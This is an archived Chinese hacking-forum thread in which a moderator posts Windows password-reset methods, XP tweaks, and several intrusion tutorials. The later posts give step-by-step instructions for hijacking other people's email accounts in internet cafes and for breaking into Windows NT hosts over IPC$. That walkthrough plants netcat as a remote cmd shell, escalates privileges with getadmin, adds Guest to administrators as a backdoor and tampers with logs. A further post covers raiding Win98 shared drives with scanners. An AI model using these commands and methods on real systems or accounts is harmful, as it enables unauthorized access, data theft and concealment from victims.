20CN网络安全小组论坛 - 菜鸟乐园 - Windows2000/NT/XP管理员密码丢失解决方法不完全方法

论坛: 菜鸟乐园标题: Windows2000/NT/XP管理员密码丢失解决方法不完全方法

作者: abctm [abctm]

版主

〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓
Windows 2000/NT/XP管理员密码丢失解决方法不完全方法
〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓
经常被问即管理员密码丢失怎么办？下边就windows 2000/nt/xp系统下的解决方法作一个简单的总结，当然并不全面。

1：清除sam文件：
WinNT系列的系统账户信息是存在%systemroot%\system32\config\sam这个注册表文件里的。如果系统里没有重要的账户，或者账户比较少，用删除%systemroot%\system32\config\sam的方法是比较简单的，不过因为系统会还原为只有administrator（密码为空）和guest二个账户，所以有些程序因为它们所依赖的账户丢失了，如iis、vmware就不能启动了。
原来听说这种方法只能适用于nt workstation系列（2kpro），不能用于server，我在2000professional和2000 advanced server上试验都是成功的。不知道为什么会有上述说法，可能是活动目录ad下不行吧。
当然首先你要能够访问系统分区，来把sam文件改名或者删除。如果是fat32、fat分区，使用98启动盘就行了。如果是ntfs分区，可以使用winternal的ntfs for dos、ntfs for 98或者是支持ntfs的启动光盘，再或者挂到其他win2000、linux等机器上，再再或者重新安装一个新的win2000。

2：专用工具：
windows管理员密码丢失还有一个解决方法是使用Petter Nordahl-Hagen的The Offline NT Password Editor(http://home.eunet.no/~pnordahl/ntpasswd/)，这个工具是离线修改注册表文件sam来设置密码的。需要用他的映像文件制作启动盘来引导，进而访问ntfs分区重新设置密码；虽然作者经常更新他的程序，不过我还是会担心他直接操作sam文件的安全性，可能有时会导致系统出错。可能还有其他类似工具吧，恕我无知。

3：还有一种想法就是用一个修改密码的小程序来替换系统启动的必要程序，然后系统启动时就会替换密码，随后把被替换的程序在还原就行了。当然首先你还是要能够访问系统分区，来替换随系统启动的程序。

替换系统启动的必要程序的一种方法是我写的一个清除administrator密码的小程序(CleanPwd：http://www.BingleSite.net/myprog/CleanPwd/CleanPwd.rar)，他所作的就是把administrator密码清空。使用方法如下：
1)：用双系统或者启动盘或者挂到别的系统上，如果是NTFS分区其他系统或启动盘要能读写NTFS分区，把windows安装目录下的system32\svchost.exe改名svchost.bak.exe备份，把CleanPwd.exe拷贝成svchost.exe。

2)：启动该系统，就把administrator的密码清空了，可以直接登陆。

3)：把svchost.bak.exe 恢复就行了（如果使用替换的是svchost，最好再启动rpc服务）。为什么选用svchost.exe而不是其他程序，因为每个windows2000系统都有这几个进程，System(kernel Executive and kernel)、smss(session manager)、csrss(win32 subsystem)、winlogon(logon process)、services(Service control manager)、lsass(local security authentication server ) 如果任何一个被杀掉或者出错，系统将重新启动。不过在lsass启动之前你不能修改密码，所以不能选用这几个程序。
另外系统中一般还有以下一些程序：svchost.exe(Remote Procedure Call (RPC) 还有其他一些服务)、WBEM\WinMgmt.exe(Windows Management Instrumentation)、mstask.exe(Task Scheduler)、regsvc.exe(Remote Registry Service) 可能还有其他服务程序，你可能禁止了除RPC之外的其他服务，但不会禁止rpc，否则系统工作就不正常了。所以我选择了svchost，如果你知道其他服务会自动启动，你也可以选择它。当然如果系统安装了杀毒软件的话，你替换杀毒软件也可以，因为一般杀毒软件都会在系统启动是启动杀毒防火墙来杀毒的。

4)：其他：有这个想法是几个月之前了，不过一直没有写这个程序:( 程序运行会在c:\CleanPwd.txt记一个简单的日志，我也附了源码，你可以任意修改它以满足自己的要求，比如添加一个用户而不是修改管理员的密码（或者你把管理员改名了）。

4：我还在一个网站上看到这样一个方法：就是把%systemroot%\system32\logon.scr替换为cmd.exe或者explorer.exe，然后在系统登陆处等待，过一会，系统就会去运行logon.scr这个屏保，因为你替换了这个屏保文件，所以实际上运行的是cmd.exe或者explorer.exe，并且是localsystem权限，于是你可以随便了，最简单的就是在cmd.exe里运行net user administrator ""，成功后管理员密码也被清空了，关闭cmd或者explorer就可以用空口令登陆了。其实这种方法和上边的那种思路是一致的。

================= code begin =======================
#include
#include
#include
#include
#include
#pragma comment(lib, "Netapi32.lib")

#define LOF_FILE "c:\\cleanpwd.txt"

DWORD SetUserPwd(char *user, char *pass);

void banner(FILE *fp)
{
if(NULL == fp)return;

fprintf(fp, "Clean administrator's password tool 1a. for lost password.\n");
fprintf(fp, " by bingle@email.com.cn\n");
fprintf(fp, "Website: http://www.BingleSite.net\n");
}

int main(int argc, char *argv[])
{
banner(stderr);

FILE *fp = fopen(LOF_FILE, "a");
if(fp)
{
fprintf(stderr, "Log in file %s\n", LOF_FILE);
banner(fp);
}

if(!fp) fp = stderr;

char buff[256];
fprintf(fp, "%s: clean administrator's password ", _strtime(buff));
DWORD n = SetUserPwd("administrator", "");
if(NERR_Success == n) fprintf(fp, "ok.\n");
else fprintf(fp, "failed, error:%d\n", n);

fclose(fp);

return -1;
}

DWORD SetUserPwd(char *user, char *pass)
{
wchar_t wuser[PWLEN], wpass[PWLEN];
USER_INFO_1003 ui;

mbstowcs(wuser, user, strlen(user)+1);
mbstowcs(wpass, pass, strlen(pass)+1);
ui.usri1003_password = wpass;

return NetUserSetInfo(NULL, wuser, 1003, (LPBYTE)&ui, NULL);
}

================= code end =======================

[此贴被日月双星(abctm) 在 11月05日21时01分编辑过]

[此贴被日月双星(abctm) 在 11月09日13时54分编辑过]

地主发表时间: 11/05 21:48

回复: abctm [abctm]

版主

〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓
加强WinXP功能修改内部设置值
〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓
Dos下灌Xp
a.首先找到Smartdrv.exe(windows98里都有),存到磁盘片中或其他硬盘中
不要也可以,但是你会灌死(可能要一个半小时以上)
b.用98开机片开机即可
c.执行smartdrv.exe(此动作可让 WIN 2000 安装更快
d.假设XP光盘在 K槽,键入K:\CD I386按ENTER
K:\I386>WINNT按ENTER，之後应该就进入安装画面了

1.***XP减肥方法 ***
a.删除系统文件备份
sfc.exe /purgecache
b.删除驱动备份
windows\driver cache\i386目录下的Driver.cab文件（73mb)
c.取消系统还原
d.删除Help文件（减掉40多mb)
e.删掉\WINDOWS\system32\dllcache下文件(减去200-300mb),这是备用的dll文件
只要你已拷贝了安装文件，完全可以这样做。
f.把我的文件、IE的寄存文件夹都转到其他硬盘（分区）。
g.把虚拟存储器也转到其他硬盘。
h.将应用软件装在其他硬盘（这对重装系统也有好处）。
i.删除\windows\ime下不用的输入法!(日文，韩文，简体中文输入法，84.5MB)
j.如用ntfs装xp,本身就节省硬盘。

2.删除烦人的msn，windows messenger
到C:\windows\inf\ 打开sysoc.inf
找 msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,hide,7 ，移掉 hide，
变成msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,,7 ，存文件後关起来
到控制面板-新建删除程序就有选项可以删除了。

3.设置共享权限的地方设置
控制面板-->管理工具-->本机安全性原则-->安全性设置 -->
(左)本机原则-安全性选项-->网络存取-->共享和安全性模式用於本机:
改成传统 (本机用户以自身身分验证)

4.解决不能关机的问题┅
控制面板-电源选项-高级电源管理-高级打勾

5.启动测试
开完机後可以试试在执行列上打 oobe/msoobe /a
如果出现，Windows 产品启用
Windows 已经启用。请按[确定]结束。

6.XP版本
找寻电脑中windows/system32/NTOSKRNL.EXE的这个文件-->按右键-->选内容

7.XP要做开机磁盘
在A槽-->按右键-->选格式化-->选建立一个MS-DOS开机磁盘

8.XP的网上邻居(先假设网络都没问题)
控制面板-->用户帐户-->建立新的帐户
-->输入那台电脑的开机帐号(电脑名称)及密码(不能空白)
-->选择"受限制的帐户"-->完成，这样别人就可以登陆你的电脑里棉

控制面板--->管理工具----->电脑管理--->本机用户合工作组
然後在用户里面要把guset的帐户打开使用
这样子别人才能进你的pc

局域网文件打印机资源共享(网上邻居)
网络设置部分
要至少安装一局域网协定
如IPX/SPX 或NetBUIE
要有Client for Microsoft Networks
与 File and Printer Sharing for Microsoft Networks
NT 2000 XP系统必须开设帐号给98 ME系统
网络识别部分
工作工作组要相同
电脑名称不能相同
不可使用网域(网欲需要nt server做统驭)
存取控制
采用共享级方式个别设置磁盘与文件夹的存取权限
打开需要分享的磁盘或打印机做文件分享的实际设置
注意事项
所有有关防火墙的部分要关闭
不然就要开放信任需要资源共享的ip范围
PCCILLIN2002的防火墙功能也要注意

9.复制贴上变乱码
应该是英文用中文界面，剪贴中文时当成Unicode吧。
要简的时候打开任何中文输入法(中文键盘)应该就可以解决。

10. XP关闭系统休眠功能
因为休眠功能占的硬盘空间蛮大的，所以关闭比较好,
控制面板-->电源选项-->休眠(不要打勾)

11.XP里关闭光盘Autorun功能
1.打开光盘机的内容,将自动拨放里所有的光盘格式都设为不要有任何动作
OR
2.利用Group Policy (执行gpedit.msc)
到电脑设置-->系统管理模板-->系统
找到-->关闭自动拨放
按右键选-->内容,选择已-->启用,
在下面那里选-->所有的驱动器,
然後套用,重新开机,应该也可以,但是这个方法不能关闭音乐CD的自动拨放

12.驱动程序的问题
XP安装驱动程序往往因为数位签署ㄉ关系挂不上去----->
把数位签署忽略掉===>
控制面板----->系统------>硬件----->设备管理器----->驱动程序签署---->略过

13.XP里怎麽开DMA
关於DMA:
到设备管理器里选择IDE ATA/ATAPI controllers
到Primary/Secondary IDE Channel里面的高级设置
将所有的转送模式都设置为使用DMA(如果可用的话)
系统就会自动打开DMA支持(在BIOS里也应该要先设为支持DMA)

14.窗关错误回报
控制面板---->系统---->高级---->右下角--->错误报告---->关闭

15.有改机值的∶
a.加快菜单显示速度
打开注册表编辑器，找到 HKEY_CURRENT_USER\Control Panel\Desktop，
将其下的 MenuShowDelay 项改为∶0 ( 原设置值∶400 )，
你的菜单将会出乎意料地快。

b.使用Winxp的网友请务必检查一下
开始-->>执行-->>regedit
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion]
将 "RegDone" = 的数值，由 "0" 改成 "1"
如此才算完全"破解" ,这个动作很重要
很多奇怪的小毛病因此而解决
请大家务必检查一下...........
PS: 修改这个数值，表示已经联机注册过，并完成注册程序。
只是纯粹只是为了能自由自在的使用 Windows Update 而已。

c.加速XP的开关机 ***
缩短等待时间
打开注册表编辑器，找到 HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control，
将 WaitToKillServiceTimeout 设为∶1000或更小。 ( 原设置值∶20000 )

d.
找到 HKEY_CURRENT_USER\Control Panel\Desktop 键，将右边窗口的 WaitToKillAppTimeout 改为 1000，
( 原设置值∶20000 )即关闭程序时仅等待1秒。将 HungAppTimeout 值改为∶200( 原设置值∶5000 )，
表示程序出错时等待0.5秒。

e.
让系统自动关闭停止回送的程序。打开注册表 HKEY_CURRENT_USER\Control Panel\Desktop 键，
将 AutoEndTasks 值设为 1。 ( 原设置值∶0 )

B1层发表时间: 11/05 21:56

回复: abctm [abctm]

版主

↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓
→→→今天是偶的生日为了庆祝，我发几个帖子大家要顶偶←←←
↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑

〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓
不用任何软件（木马程序）盗取帐号密码
〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓
信不信，我不用软件（木马程序）就能盗取任何帐号密码；适应环境一般是在网吧或公司。笔者以邮箱为例；1、猜测法：这可不是乱猜哦，是有根据的。很多人有这样的习惯，（1）以自己的姓名拼音设置账号密码，如：lixue、xiaowen等（2）以自己的生日号码设置帐号密码，如：19880325、970208、871108等（3）以简单易记的英语词汇设置帐号密码，如：hello、thanks、love等。现在开始破解邮箱：首先先了解对方的有关信息，如：邮箱帐号（用户名）、真实姓名、生日等，了解得越多破解成功率更大哦！知道对方的邮箱帐号（用户名）和姓名后，开始行动！登录对方邮箱的服务器（即邮箱提供商）如：www.163.com ；第一步完成，接着第二步，登录邮箱，输入对方邮箱帐号和密码（即对方姓名拼音），碰碰运气；如果不成功，还有第三步，以对方的生日号码或对方常用的英语词汇为密码，是否Good luck!否，就攻击另一个目标吧！2、返回法：成功率99.999……%，具有神话传说的宝莲灯的神奇力量，时空逆转，是不是很酷啊！利用这种无蛛丝马迹的绝技，保证修改帐号密码不被任何人查出来（任何人指的是网吧人员或网友们哦！）；这回可不会遭到像木马程序的下场哦，神不知鬼不觉，任你逍遥，天下在眼前，哈哈……，开始吧！上网后，上网记录会被写入系统日志，可以从系统日志下手，但要会看得懂日志，别小看系统日志哦，很多日志都是由程序编写的，所以只有熟悉程序的电脑人员（高手）才看得懂哦！用简单易用的绝技吧，“宝莲灯”重现江湖啦！灵活巧妙，利用IE浏览器的“前进”和“后退”按钮。（1）环境网吧，适应所有的帐号密码。第一步，死盯不放对方的一举一动，盯住对方有无登录邮箱或其它东东。（2）等对方下机或离开网吧后，准备行动。提示：请不要急于破解，所谓“忍一时风平浪静，退一步海阔天空”，更要保持镇定，以免有人怀疑。推荐：请等对方离开网吧后再进行破解。（3）开始吧！首先查看IE浏览器的地址栏有无登录邮箱或其它东东的网址记录，如果有，破解成功率近达99.999……%，这里以有为例；登录对方刚才的邮箱或其它东东网址，进入对方的邮箱或其它东东后，开始修改邮箱或其它东东的帐号密码，如果遇到最头痛的提供资料，如：“旧密码”、“密码提示问题”或“密码提示问题答案”等，唉，破解成功率99.999……%下降了99.999……%，其实，也没这么夸张，还有其它绝技；刚才死盯不放那么久，多多少少应该看到了点什么资料吧！如：对方的姓名、生日号码、网名（昵称）、邮箱地址、密码提示问题和提示问题答案等；如果知道了对方的“密码提示问题”、“提示问题答案”或邮箱地址，那破解成功率升高了99.999……%，（这当然知道了，你不可能那么笨吧，连这也察觉不到，因为你进入了邮箱或其它东东，当然看到自己的资料啦！至于密码嘛，就可能没有提供（显示），如果有，破解不费吹风之力。）（4）如果无登录网址记录，那就用最后一招“宝莲灯”时空逆转；方法是执行IE浏览器的“前进”和“后退”按钮，这样就能进入登录社区，破解方法跟第（3）步差不多，根据第（3）步进行破解，这里就不重复了，BYE！等等，笔者还有劝告呢，此文章只供个人研究学习，请不要用于非法行为，否则后果自负！

B2层发表时间: 11/05 22:11

回复: abctm [abctm]

版主

→←→←→←←→←→←→←→←→←→←→←→←→←→←
IPC入侵全攻略(菜鸟必读)
★★★★★★★★★★★★★★★★★★★★★★★★★★★
IPC入侵全攻略(菜鸟必读)
IPC是Internet Process Connection的缩写，也就是远程网络连接。它是Windows NT及Windows 2000特有的一项功能，特点是在同一时间内，两个IP之间只允许建立一个连接。好了，废话少说，现在进入主题。

如何找到具有IPC漏洞的主机呢？以前我都是组合一个国外的扫描工具（名字我忘了）和KillUSA的LetMeIn，因为很多工作都是手工完成的，所以速度可想而知了。现在因为有了小榕的流光2000，所以找到这样的主机实在是太简单了，具体操作我就不说了，大家可以参考该软件的说明文档。

好了，假设我们已经找到了一台这样的主机，地址是139.223.200.xxx，管理员帐号是Administrator，密码是123456。进入命令行方式，正式开工。需要说明的是，以下操作都是在目标主机没有禁止远程IPC$连接和启动Schedule服务的理想情况下进行的。

F:\>net use \\139.223.200.xxx\ipc$ "123456" /user:"Administrator"
命令成功完成。

F:\>copy nc.exe \\139.223.200.xxx\admin$
已复制 1 个文件。

F:\>net time \\139.223.200.xxx
\\139.223.200.xxx 的当前时间是 2000/12/25 上午 10:25
在 \\139.223.200.xxx 的本地时间 (GMT - 07:00) 是 2000/12/25 上午10:35
命令成功完成。

F:\>at \\139.223.200.xxx 10:38 nc -l -p 1234 -t -e cmd.exe
新增加了一项作业，其作业 ID = 0

F:\>telnet 139.223.200.xxx 1234

上面的命令很简单，你只要参考一下net，at和nc的用法就可以了。这样，我们就登上了远程的主机。最理想的情况是这样的，但是，也许你会遇到目标主机的Schedule服务没有启动的情况，那么，at命令就不能用了，我们就需要增加以下步骤。

F:\>at \\139.223.200.xxx 10:38 nc -l -p 1234 -t -e cmd.exe
服务仍未启动。

F:\>netsvc \\139.223.200.xxx schedule /start
Service is running on \\139.223.200.xxx

登上远程主机之后，我们可以做什么呢？这要视这个帐号的权限以及该主机的安全策略来决定。如果你的权限不够的话，可以试试下面的步骤。首先在本地执行下面的命令。

F:\>copy getadmin.exe \\139.223.200.xxx\admin$
已复制 1 个文件。

F:\>copy gasys.dll \\139.223.200.xxx\admin$
已复制 1 个文件。

其次，在远程主机运行下面的命令。

C:\WINNT\system32>getadmin

如果成功的话，你就是这台主机的管理员了，权限够大了吧？：-）

那么，现在我们能做什么呢？改主页？下载SAM数据库？都可以啦！方法有很多，我就不一一说了，具体方法可以参考相关教程。我一般对目标主机上的WORD文档和数据库比较感兴趣，呵呵。。。

其实，如果你在这台机子上面放个木马或者病毒什么的东东，做起事来更容易一些，但是我觉得如果你跟他没什么深仇大恨的话，还是不要这么做了，这样不好。

做完了你要做的事，不要忘了做个后门。

C:\WINNT\system32>net user Guest 30906766
net use
Guest 30906766
The command completed successfully.

C:\WINNT\system32>net localgroup administrators Guest /add
net localgroup administrators Guest /add
The command completed successfully.

这是个比较简单的后门，要想做的更好一些，可以象Linux那样，做出一套RootKits来，其实这样的东东目前已经有了，你只要拿来用就可以了。现在搞破坏真是简单多了，那么多的傻瓜工具任你用，哎！要想自保，不学点安全知识怎么行呢？

最后，我们得修理一下日志。虽然Redp0wer告诉我很少管理员会看NT的日志，但是我想修理一下还是有用的。NT的日志在什么地方呢？可以参考XUDI的文章。但是有一点要记住的是，日志只能修改，不能删除，否则就是自己把自己出卖了！：-）这方面的命令行工具也不少，你可以到一些国外的站点去看看。

其实有了这台主机，你还可以做的更多。

智慧+毅力+灵感=成功，这是我的经验。

B3层发表时间: 11/05 22:18

回复: abctm [abctm]

版主

菜鸟入侵windows98系统
〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓
关于入侵windows98系统(主机设有共享盘)的几个方法:
一.最简单的一种用软件入侵:
(1)用月光追捕查一段ip得到某些ip主机的电脑名
(2)在Windows目录下有一文件名为LMHOSTS.SAM，将其改名为LMHOSTS（无后缀），删除其内容，将对方的IP及电脑名按以下格式写入文件： XX.XX.XX.XX 电脑名(回车)
(3)右键点网络邻居-查找-电脑中输入对方电脑名，出现对方电脑点击即可进入。

二.稍为复杂的一种不用工具：
(1).判断对方上网的地点，开个DOS窗口键入 TRACERT XX.XX.XX.XX （xx指ip)
第4和第5行反映的信息既是对方的上网地点。
(2).得到对方电脑的名称，开个DOS窗口键入 NBTSTAT -A XX.XX.XX.XX
第一行是对方电脑名称，第二行是对方电脑所在工作组，第三行是对方电脑的说明。
(3).在Windows目录下有一文件名为LMHOSTS.SAM，将其改名为LMHOSTS，删除其内容，将对方的IP及电脑名按以下格式写入文件：XX.XX.XX.XX 电脑名
(4).开DOS窗口键入 NBTSTAT -R
(5).在开始-查找-电脑中输入对方电脑名，出现对方电脑点击即可进入。

三、完全傻瓜工具篇:
legion 2.1 大家可以到这里下载。http://warex.box.sk/files/scanners/legion.zip (用网络刺客也可以).legion运行后,在主界面里，我们可以看到。写着scan type扫描类型的框里面有两个单选项，一个是scanRange 扫描范围，就是扫描一段ＩＰ地址。另一个是scan list扫描列表，是对一个文本文件里的文件里的ＩＰ列表来进行扫描的。默认是选的scan range 这里我们不改它。
下面的是一个connection speed连接速度。里面有slower（慢），28.8Kps，56Kps，faster快。
你可以根据你的网速来调整。这里我们选到56Kps ，当然你如果是教育网接入，或者你扫描局域网里的机器，我们就可以选faster.最快的，让我们的扫描速度更快。右边的一个是两个IP编辑框，我们输入要扫描的IP范围。比如
203.203.1.1------203.203.1.254扫描一个Ｃ类IP 或者是
203.203.1.1------203.203.254.254 扫描一个Ｂ类IP.
几分钟后，我们回来。发现在程序主界面的左边和右边都出现了一些字符其中左边的是找到有共享的ＩＰ地址。右边的是找到共享数目。一般在右边的是\\ip\找到的共享名。很多共享你会发现\\ip\c \\ip\d \\ip\e等的。那样的共享一般是别人共享了整个Ｃ，Ｄ，Ｅ盘的。我们来看一个\\ip\c的。在左边的ＩＰ列表中，我们找到ＩＰ下面有Ｃ盘符的。然后点击Map drive 映射网络盘。OICQ:9750406它会弹出一个窗口提示你\\ip\c已经被映射成Ｇ或者其他盘符了。现在我们的可以在我的电脑里找到一个网络盘Ｇ。象平时我们打开Ｃ盘等一样，我们点击就可以进去。

四、最为复杂的一种（入侵winnt的简单教程）：
首先让我们来学一些基础知识吧。
1、先是NET VIEW命令。
作用：显示域列表、计算机列表或指定计算机的共享资源列表。
命令格式：net view [\\computername /domain[:domainname]
参数介绍：
(1)键入不带参数的net view显示当前域的计算机列表。
(2)\\computername 指定要查看其共享资源的计算机。
(3)/domain[:domainname]指定要查看其可用计算机的域。
简单举例：
(1)net view \\host查看host的共享资源列表。 host可以为IP,也可以为域名。
(2)net view /domain:LOVE查看LOVE域中的机器列表。
2、其次再来学习一下NET USE命令。
作用：连接计算机或断开计算机与共享资源的连接，或显示计算机的连接信息。
命令格式：net use [devicename *] [\\computername\sharename[\volume] [password *] [/user:[domainname\]username] [/delete] [/persistent:{yes no]}
参数介绍：键入不带参数的net use列出网络连接。
devicename指定要连接到的资源名称或要断开的设备名称。
\\computername\sharename服务器及共享资源的名称。
password访问共享资源的密码。 *提示键入密码。
/user指定进行连接的另外一个用户。
domainname指定另一个域。
username指定登录的用户名。
/home将用户连接到其宿主目录。
/delete取消指定网络连接。
/persistent控制永久网络连接的使用。
简单事例：
(1)net use e: \\host\TEMP将\\host\TEMP目录建立为E盘
(2)net use e: \\host\TEMP /delete断开连接
(3)net use \\host "password" /user:"administrator"
3.Net Share 作用：创建、删除或显示共享资源。
命令格式：net share sharename=driveath [/users:number /unlimited] [/remark:"text"]
参数介绍：
(1)键入不带参数的net share显示本地计算机上所有共享资源的信息。
(2)sharename是共享资源的网络名称。
(3)driveath指定共享目录的绝对路径。
(4)/users:number设置可同时访问共享资源的最大用户数。
(5)/unlimited不限制同时访问共享资源的用户数。
(6)/remark:"text "添加关于资源的注释，注释文字用引号引住。
简单事例：
(1)net share mylove=c:\temp /remark:"my first share"以mylove为共享名共享C:\temp
(2)net share mylove /delete停止共享mylove目录
4.NET USER 作用：添加或更改用户帐号或显示用户帐号信息。该命令也可以写为 net users。
命令格式：net user [username [password *] [options] [/domain]
参数介绍：
(1)键入不带参数的net user查看计算机上的用户帐号列表。
(2)username添加、删除、更改或查看用户帐号名。
(3)password为用户帐号分配或更改密码。
(4)*提示输入密码。
(5)/domain在计算机主域的主域控制器中执行操作。
简单事例：
net user yfang查看用户YFANG的信息
5.再来学习ＩＰＣ连接是什么东西．我们来看看ＩＰＣ。它本来是UNIX的进程间通讯的意思，这里我说的是Windows下的ＩＰＣ，他主要是共享命名管道的资源，它对于程序间的通讯很重要。在远程管理计算机和查看计算机的共享资源时使用。 Windows 下，它是用 Net 命令来实现的．在检测报告中我们很常可以看到空连接　的字样，很多人不知道什么是空连接，他其实就是不用密码和用户名的ＩＰＣ连接具体为：net use \\ＩＰ "" /user:""
假设我们成功的探测到了台湾的ＮＴ主机211.21.193.202的超级管理员administrator的密码为空．
NT远程登陆的命令行语法：net use \\IP Address\IPC$ ["password"] /user:"username"
退出登陆的语法：net use \\IP Address\IPC$ /delete
net use \\211.21.193.202\ipc$ "" /user:"administrator"
如果显示：命令成功完成那我们的通过ＩＰＣ的远程登陆就成功了．

B4层发表时间: 11/05 22:21

回复: abctm [abctm]

版主

？？？？

B5层发表时间: 11/05 22:56

回复: abctm [abctm]

版主

!!!!

B6层发表时间: 11/06 21:24

回复: abctm [abctm]

版主

～～